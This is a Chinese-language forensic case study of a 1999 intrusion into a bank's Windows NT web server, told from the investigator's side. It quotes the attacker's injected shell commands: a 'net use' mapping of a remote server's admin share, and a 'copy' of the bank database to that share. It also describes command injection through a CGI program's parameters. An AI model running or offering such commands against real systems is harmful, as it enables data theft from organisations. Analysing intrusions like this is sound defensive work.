东亚某银行
时间:1999年12月 该网站为WindowsNT 4.0,是这个国家最大的银行之一。该网站BankServer实际上有两道安全防线,首先在其路由器的访问控制表中(ACL)做了严格的端口过滤限制,只允许对80、443、65300进行incoming访问,另一道防火墙为全世界市场份额最大的软件防火墙FW,在FW防火墙上除了端口访问控制外,还禁止了很多异常的、利用已知CGI bug的非法调用。在12月某日,该银行网站的系统管理员Ymouse(呢称)突然发现在任务列表中有一个杀不死的CMD.exe进程,而在BankServer系统上并没有与CMD.exe相关的服务。该系统管理员在一黑客聊天室向本站技术人员F求救。F认为这是一个典型的NT系统已经遭受入侵的迹象。通过Email授权,F开始分析该系统的安全问题,从外部看,除WWW服务外,BankServer并没有向外开放任何有安全问题的服务。但F在该网站的上游路由器发现一个安全问题,允许入侵者获取该路由器的配置文件和破解密码。经过系统管理员Ymouse的再次授权确认,F仅用了3分钟,就获取了该路由器的访问密码;登录路由器后,经过复杂的分析发现,虽然该银行网站没有incoming的可疑通信,却发现BankServer正在向外连接着另一台NT服务器Wserver的139端口。通过进一步的分析,证实有人从BankServer登录到了Wserver的C盘。Wserver是一台韩国的NT服务器,不受任何安全保护的裸机。F对Wserver进行了一次简单的扫描,结果意外地发现Wserver的管理员帐号的密码极为简单,可以轻易获取对该系统的完全控制。更令人吃惊的是,在这台韩国的服务器的C盘上,保存着上面提到的东亚某银行的一个重要数据库文件!更多的文件正在从BankServer上往这台韩国的Wserver上传送!
至此问题已经有了初步的轮廓。入侵者通过某种手段(最可能是利用WWW服务的漏洞),可以在BankServer上执行NT的shell指令。虽然入侵者不能直接登录BankServer的硬盘,但他入侵了另一台NT的Server,获取了该系统的管理员帐号。入侵者通过这台BankServer的shell指令(net use * \\xxx.xxx.xxx.xxx\c$ passwd /user:"administrator"),将Wserver的C盘映射成为了BankServer上的一个盘符。然后,入侵者利用copy命令,将该系统上的重要文件往Wserver上传送。 但是,既然BankServer上根本没有可以登录的入口,入侵者是如何浏览BankServer上的文件系统的?他又怎么知道哪些文件才是重要的数据文件?为了找到这个问题的答案,F请Ymouse检查了一下BankServer上的web目录。Ymouse发现,在web目录下多了一个可疑的abc目录,目录中的文件全部为文本文件,分别为x1.txt、x2.txt、x3.txt......逐个检查这些文件发现,这些文件大部分是dir c:\>x.txt 和dir c:\data>x.txt 生成的结果。这些文件通过 http://BankServer/abc/x.txt 的方式可以浏览。由此可见,入侵者逐个通过一些巧妙的shell指令,不仅实现了浏览系统重要文件,而且实现了创建文件、修改文件和把文件传送出去的目的。当然入侵者也可以删除系统上的文件。看起来他几乎可以做任何事情。 为了了解入侵者是如何获取系统shell的,F让Ymouse检查了最近三天的web访问日志,幸运的是,由于系统管理员在设置系统的时候多了一个心眼,把日志目录放在E盘上,而不是象缺省的那样放在c:\winnt\system32\logfiles下面。(入侵者删除了c:\winnt\system32\logfiles下面的所有文件)入侵者似乎并没有发现这些日志。当天日志显示,在 http://BankServer/login/redir.exe 被多次调用。在调用参数的末尾,Ymouse发现了很多shell指令,其中就包括了 copy c:\data\db1.dat h: ,其中h:盘就是韩国Wserver的C盘。这表明,入侵者正是利用 redir.exe这个程序的漏洞,实现对系统的非法调用的。redir.exe是该银行自行编写的CGI程序。
最后,还有一个问题没有明确的答案。入侵者大约在前一天删除了 c:\winnt\system32\logfiles 下面的所有文件,但删除这些文件是需要管理员的权限的。入侵者是如何获取管理员的身份执行shell指令的。Ymouse检查了IUSR_BankServer的权限,没有发现异常,只是Domain Users和Guests两个组,没有Admin的权限。又或者是系统还有更为严重的漏洞?又或者是redir.exe还有其它漏洞足以获取Admin的访问?由于该安全调查纯属免费,没有再进一步深究。